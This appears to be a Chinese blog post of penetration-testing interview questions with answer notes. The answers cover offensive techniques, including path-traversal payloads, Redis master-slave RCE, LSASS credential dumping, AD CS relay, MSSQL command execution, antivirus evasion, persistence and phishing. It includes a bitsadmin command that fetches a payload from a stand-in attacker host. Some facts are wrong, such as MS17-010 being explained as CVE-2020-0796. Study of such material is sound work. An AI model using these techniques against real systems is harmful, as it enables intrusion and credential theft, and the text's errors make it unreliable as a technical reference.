网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年渗透测试面试题总结-拷打题库37
代码审计,做过哪些,主流的代码审计 java 框架请简述 泛微,致远,用友这三套系统代码框架简述 泛微的前台漏洞触发和后台漏洞触发,如何通用性的挖泛微的洞,泛微能反序列化吗, 怎么挖 php 代码审计如果审计到了一个文件下载漏洞,如何深入的去利用? php 里面的 disable_function 如何去进行绕过,为什么可以绕过,原理是什么 假如说,在攻防的时候,控下来一台机器,但是只是一台云主机,没有连接内网,然后 也没有云内网,请问怎么深入的对这台云主机进行利用? redis 怎么去做攻击,主从复制利用条件,为什么主从复制可以做到拿 shell,原理是什 么,主从复制会影响业务吗,主从复制的原理是什么? becl 利用链使用条件,原理,代码跟过底层没有,怎么调用的? 假如我攻击了一台 17010 的机器,然后机器被打重启了,然后重启成功后,机器又打成 功了,但是无法抓到密码,为什么无法抓到,这种情况怎么解决这个问题? 内网我现在在域外有一台工作组机器的权限,但是没有域用户,横向也不能通过漏洞打 到一台域用户的权限,但是我知道一定有域,请问这种情况怎么进入域中找到域控? jboss 反序列化漏洞原理 内网拿到了一台 mssql 机器的权限,但是主机上有 360,一开 xpcmdshell 就被拦截了, 执行命令的权限都没有,这种情况怎么进行绕过。 什么是 mssql 的存储过程,本质是什么?为什么存储过程可以执行命令? 如果想通过 mssql 上传文件,需要开启哪个存储过程的权限? 内网文件 exe 落地怎么去做,用什么命令去执行来落地,如果目标主机不出网怎么办? 内网域渗透中,利用 ntlm relay 配合 adcs 这个漏洞的情况,需要什么利用条件,responder 这台主机开在哪台机器上,为什么,同时为什么 adcs 这个漏洞能获取域管理员权限,原理 是什么 内网域渗透中,最新出的 CVE-2022-26923 ADCS 权限提升漏洞需要什么利用条件,原理 是什么,相比原来的 ESC8 漏洞有什么利用优势? 内网渗透中,如果拿到了一套 vcenter 的权限,如何去进一步深入利用?db 文件如何解 密?原理是什么? vcenter 机器拿到管理员密码了,也登录进去了,但是存在一个问题,就是内部有些机 器锁屏了,需要输入密码,这个时候怎么去利用? 内网权限维持的时候,360 开启了晶核模式,怎么去尝试权限维持?计划任务被拦截了 怎么办? mssql 除了 xpcmdshell,还有什么执行系统命令的方式?需要什么权限才可以执行? 如果 net group "Domain Admins" /domain 这条命令,查询域内管理员,没法查到,那么 可能出现了什么问题?怎么解决 查询域内管理员的这条命令的本质究竟是去哪里查,为什么输入了之后就可以查到? 免杀中,如何去过国内的杀软,杀软究竟在杀什么?那么国外的杀软比如卡巴斯基为什 么同样的方法过不了呢? 免杀中,分离免杀和单体免杀有啥区别,为什么要分离,本质是什么? 打点常用什么漏洞,请简述 内网横向中,是直接进去拿一台机器的权限直接开扫,还是有别的方法? 钓鱼用什么来钓?文案思路?如何判断目标单位的机器是哪种协议出网?是只做一套来钓鱼还是做几套来钓鱼?如何提高钓鱼成功率? 钓鱼上线的主机,如何进行利用?背景是只发现了一个域用户,但是也抓不到密码,但是有域 sql注入在mysql和sqlserver中有什么区别代码审计与主流Java框架
- 代码审计经验
- Spring框架:审计重点包括SPEL表达式注入(CVE-2022-22963)、未授权端点(如Actuator)、参数绑定漏洞(如
@RequestParam未过滤)。- Struts2:历史漏洞如OGNL表达式注入(CVE-2017-5638),需关注
struts.xml配置和拦截器链安全性。- Hibernate:SQL注入风险(如HQL拼接)、二级缓存反序列化漏洞(CVE-2020-25638)。
- 主流框架漏洞特征
- Spring Boot:默认配置风险(如
management.endpoints.web.exposure.include=*暴露监控接口)。- Apache Shiro:硬编码密钥(CVE-2016-4437)、RememberMe反序列化。
- Fastjson:
@type属性触发JNDI注入(CVE-2022-25845)。
泛微、致远、用友系统框架简述
- 泛微(e-cology)
- 架构:基于Java EE,使用自定义标签库和Servlet处理请求,数据库多为Oracle/MySQL。
- 漏洞类型:前台SQL注入(如
/mobile/plugin/changeUserInfo.jsp)、后台反序列化(XMLDecoder解析)。- 致远(A8)
- 架构:Struts2+Spring,存在OGNL表达式执行漏洞(如CVE-2023-2373)。
- 漏洞触发点:文件上传接口(
/seeyon/fileUpload.do)、登录逻辑绕过。- 用友(NC)
- 架构:Java+EJB,常见漏洞包括反序列化(如BeanShell脚本执行)、XXE(
/servlet/~ic/bsh.servlet)。
泛微漏洞挖掘与反序列化利用
- 前台漏洞挖掘
- 参数注入:测试
/api接口参数是否未过滤(如username=admin' AND 1=1--)。- 文件上传:绕过后缀检查(
.jspx伪装为.jpg),结合目录穿越写入Web目录。- 后台漏洞触发
- 反序列化:通过
weaver.servlet.ajax.AjaxServlet传入恶意序列化数据触发RCE。- 配置篡改:利用后台管理功能修改SMTP配置,实现邮件钓鱼或内网探测。
- 通用挖掘思路
- 接口遍历:使用Burp爬虫扫描
/mobile、/api等路径,分析未授权访问点。- 版本比对:通过
/version.txt获取版本号,对比历史漏洞利用链。
PHP文件下载漏洞深入利用
- 路径遍历
- 利用:
download.php?file=../../../../etc/passwd,获取敏感配置文件。- 绕过:编码绕过(
%2e%2e%2f)、空字节截断(file=test.php%00.jpg)。- 结合文件包含
- 写入日志:下载
/var/log/apache2/access.log,插入PHP代码触发包含。- 上传绕过:通过下载漏洞覆盖
.htaccess,允许执行特定后缀文件。- 权限提升
- 读取SSH密钥:下载
/home/user/.ssh/id_rsa,通过私钥登录服务器。
绕过PHP disable_function的原理与方法
- LD_PRELOAD劫持
- 原理:通过
putenv设置恶意库路径,劫持函数调用(如mail()触发__libc_start_main)。- 工具:使用
bypass_disablefunc.php加载自定义.so文件。- PHP-FPM未授权访问
- 利用:通过
fastcgi://协议发送恶意请求执行命令(需开放9000端口)。- 限制:需知道PHP-FPM监听地址或利用SSRF漏洞。
- ImageMagick漏洞
- 原理:利用
ImageMagick处理图片时的命令执行(CVE-2016-3714)。- Payload:构造
.mvg文件包含exec命令。
云主机无内网环境下的深入利用
- 权限提升
- 内核漏洞:利用DirtyPipe(CVE-2022-0847)或DirtyCow(CVE-2016-5195)提权。
- 服务配置:查找MySQL弱口令,通过UDF执行命令。
- 敏感信息收集
- 元数据服务:访问云厂商元数据接口(如AWS的
169.254.169.254)获取临时凭证。- 配置文件:读取
/home/user/.aws/credentials获取云服务密钥。- 持久化与横向
- SSH后门:写入
authorized_keys或修改.bashrc添加反向Shell。- 容器逃逸:若主机运行Docker,利用
--privileged权限逃逸到宿主机。
Redis攻击与主从复制原理
- 主从复制利用条件
- Redis版本:4.x以上支持模块加载(
.so文件)。- 网络可达:攻击机需能访问目标Redis的端口(默认6379)。
- 攻击流程
- 步骤1:伪造恶意主节点,通过
SLAVEOF命令让目标Redis同步数据。- 步骤2:同步恶意模块(如
exp.so),通过MODULE LOAD加载模块。- 步骤3:执行模块中的命令(如
system.exec "whoami")。- 业务影响
- 数据覆盖:主从复制可能覆盖目标Redis的原有数据,导致业务中断。
Becl利用链调用条件与原理
- 利用条件
- 依赖库:目标应用需包含
commons-beanutils(版本<=1.9.2)。- 反序列化入口:如HTTP参数、RMI接口接收序列化数据。
- 原理
- Gadget链:通过
BeanComparator触发恶意PropertyUtils.getProperty调用。- 触发点:反序列化时调用
compare()方法执行任意代码。- 调试与调用
- 代码跟踪:使用IDEA调试
BeanComparator.compare()方法,观察Transformer链执行。- Payload构造:使用Ysoserial生成
CommonsBeanutils1载荷。
17010漏洞利用与密码抓取失败处理
- 漏洞背景
- CVE-2020-0796:SMBv3协议漏洞,触发蓝屏后重启可能导致签名失效。
- 密码抓取失败原因
- 重启后内存重置:LSASS进程的凭据信息被清除。
- 防御机制:启用Credential Guard或LSA保护。
- 解决方案
- 重新触发漏洞:再次利用17010漏洞获取新会话,抓取登录后的凭据。
- 离线提取:通过
procdump转储LSASS内存,使用Mimikatz离线分析。
域外工作组机器渗透域控
- 信息收集
- LLMNR/NBT-NS投毒:利用Responder捕获Net-NTLM哈希,破解或中继。
- 端口扫描:扫描53(DNS)、88(Kerberos)、389(LDAP)端口定位域控。
- 协议滥用
- DNS查询:通过
nslookup查询_ldap._tcp.dc._msdcs.domain.com获取域控SRV记录。- SMB匿名访问:尝试连接
\\dc\IPC$,获取域控主机名。- 漏洞利用
- PetitPotam:触发域控强制认证,中继至AD CS(CVE-2021-36942)。
- ZeroLogon:若域控未打补丁,利用CVE-2020-1472重置密码。
JBoss反序列化漏洞原理
- 漏洞入口
- JMXInvokerServlet:默认路径
/invoker/JMXInvokerServlet接收序列化数据。- 利用链
- 依赖库:
org.jboss.invocation.MarshalledValue触发InvokerTransformer执行命令。- Payload构造:使用Ysoserial生成
JBossInvoker载荷。- 防御措施
- 删除Servlet:移除
JMXInvokerServlet相关文件。- 配置认证:启用JMX接口的访问控制。
MSSQL绕过360拦截执行命令
- 替代执行方式
- CLR集成:加载恶意.NET程序集(需
CREATE ASSEMBLY权限)。- OLE自动化:通过
sp_oacreate执行cmd.exe(需启用OLE组件)。- 权限要求
- sysadmin角色:大多数命令执行方式需要高权限。
- 组件启用:如
EXEC sp_configure 'Ole Automation Procedures', 1。- 绕过检测
- 命令混淆:使用
%COMSPEC%替代cmd.exe,或拆分命令为多个步骤。
MSSQL存储过程与文件上传
- 存储过程本质
- 预编译代码:数据库内置的可复用代码块,支持参数化调用。
- 权限继承:存储过程以定义者权限执行,可能提升权限。
- 文件上传权限
- 需开启
xp_cmdshell:默认禁用,需EXEC sp_configure 'xp_cmdshell', 1。- 替代方法:使用
BCP命令导出数据到文件。- 执行命令方式
- 扩展存储过程:如
xp_cmdshell、xp_regwrite。- SQL Agent作业:创建作业执行系统命令。
内网文件落地与不出网处理
- 文件落地方式
- Certutil编码:
certutil -encode payload.exe payload.b64,再解码执行。- BitsAdmin:
bitsadmin /transfer job http://attacker.com/payload.exe C:\payload.exe。- 不出网场景
- DNS隧道:通过
dnscat2分块传输文件。- SMB共享:从内网其他机器共享文件(需445端口开放)。
NTLM Relay配合ADCS漏洞利用
- 利用条件
- AD CS启用:证书服务未配置强访问控制。
- 中继目标:需中继至支持NTLM认证的HTTP端点(如AD CS Web注册接口)。
- Responder部署位置
- 同网段:需部署在可捕获目标机器流量的位置(如ARP欺骗环境)。
- 提权原理
- 证书申请:通过中继的NTLM认证申请域用户证书,用于Kerberos认证获取权限。
CVE-2022-26923与ESC8对比
- 利用条件
- CVE-2022-26923:需修改机器账户的
dNSHostName属性,触发证书错误。- ESC8:需AD CS Web接口支持NTLM中继。
- 优势
- 无需中继:直接利用证书模板错误,避免依赖NTLM Relay。
- 权限提升:允许普通用户提升至域管理员。
vCenter权限深入利用与DB解密
- DB文件解密
- 路径:
/storage/db/vcsa/vcdb,使用pg_dump导出数据。- 密码获取:查找
/etc/vmware-vpx/ssl/symkey.dat解密SSL证书。- 虚拟机逃逸
- CVE-2021-21972:通过vSphere Client上传恶意插件执行命令。
- 锁屏绕过
- 快照恢复:利用vCenter快照回滚至未锁屏状态。
- VMTools:通过
VMwareTools执行命令(需Tools安装且权限允许)。
绕过360晶核模式的权限维持
- 隐蔽启动项
- WMI事件订阅:通过
__EventFilter触发恶意代码执行。- 服务DLL劫持:替换合法服务的DLL文件。
- 内存马注入
- Tomcat Filter:通过Java Agent注入内存Shell。
- PowerShell无文件:通过注册表保存加密脚本片段。
- 绕过计划任务拦截
- COM对象劫持:利用
HKCU\Software\Classes\CLSID注册自定义COM组件。
MSSQL执行命令的其他方式
- 扩展存储过程
- xp_cmdshell:需启用并具备
sysadmin权限。- xp_regread/xp_regwrite:读写注册表键值。
- SQL Agent作业
- 步骤:创建作业添加命令步骤,调度立即执行。
- CLR集成
- 自定义程序集:加载C#编写的恶意DLL执行命令。
域管理员查询失败原因与解决
- 可能问题
- DNS配置错误:域控DNS记录未正确注册。
- 权限不足:当前用户无查询域管理员组的权限。
- 解决方法
- 使用LDAP查询:
ldapsearch -H ldap://dc -x -D "user" -w "pass" -b "dc=domain,dc=com" "(&(objectCategory=group)(cn=Domain Admins))"。- BloodHound分析:通过SharpHound收集域关系,可视化查询。
域管理员查询命令本质
- 底层原理
- LDAP协议:
net group命令通过LDAP查询域控的CN=Domain Admins组对象。- 端口通信:默认使用389(LDAP)或636(LDAPS)端口。
- 数据来源
- 域控数据库:查询Active Directory数据库中的
CN=Users容器。
免杀技术与国内外杀软差异
- 国内杀软绕过
- 特征码修改:加壳(UPX、自定义壳)、代码混淆(字符串加密)。
- 行为混淆:延迟执行、拆分敏感操作。
- 国外杀软(如卡巴斯基)
- 启发式检测:需绕过行为监控(如虚拟环境检测)。
- 内核级防护:绕过PatchGuard(Windows)或SELinux(Linux)。
- 分离免杀本质
- 载荷分离:下载器与恶意代码分离,减少静态检测风险。
- 内存加载:通过反射DLL或Process Hollowing避免文件落地。
打点常用漏洞类型
- Web漏洞
- SQL注入:通过联合查询获取管理员凭证。
- 文件上传:上传WebShell控制服务器。
- 服务漏洞
- RCE漏洞:如Apache Log4j2(CVE-2021-44228)。
- 反序列化:如Fastjson、Shiro漏洞。
- 协议漏洞
- SMB漏洞:如EternalBlue(MS17-010)。
- SSH弱口令:爆破或默认凭证登录。
内网横向渗透策略
- 低调扫描
- 端口扫描:使用
nmap -T2降低速度,避开IDS检测。- 协议探测:通过ICMP/TCP隐蔽通道传递数据。
- 凭证重用
- 密码喷洒:使用已获取的密码尝试登录其他机器。
- 票据传递:通过Kerberos TGT/TGS票据横向移动。
- 漏洞利用
- MS17-010:利用永恒之蓝攻击未修补的Windows主机。
- Zerologon:攻击域控获取域管理员权限。
钓鱼攻击策略与协议判断
- 钓鱼媒介
- 邮件钓鱼:伪造公司通知、工资条等诱饵。
- 即时通讯:通过企业微信、钉钉发送恶意链接。
- 协议判断方法
- 出网检测:尝试HTTP/HTTPS/DNS回连,观察监控流量。
- 端口扫描:使用
telnet或nc探测常见出网端口(80,443,53)。- 提高成功率
- 多套方案:同时准备文档宏、快捷方式LNK、伪装安装包。
- 社工结合:研究目标组织架构,冒充HR或IT部门发送邮件。
SQL注入在MySQL与SQL Server的区别
- 语法差异
- 注释符:MySQL支持
#和--,SQL Server仅支持--。- 字符串拼接:MySQL用
CONCAT(),SQL Server用+。- 系统函数
- 数据库版本:MySQL
@@version,SQL Server@@VERSION。- 错误信息:MySQL错误信息更详细,SQL Server可能隐藏部分信息。
- 利用方式
- 联合查询:MySQL需闭合引号,SQL Server可堆叠查询(
;分隔)。- 文件操作:MySQL
INTO OUTFILE,SQL Serverxp_cmdshell。
扫一扫
714
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
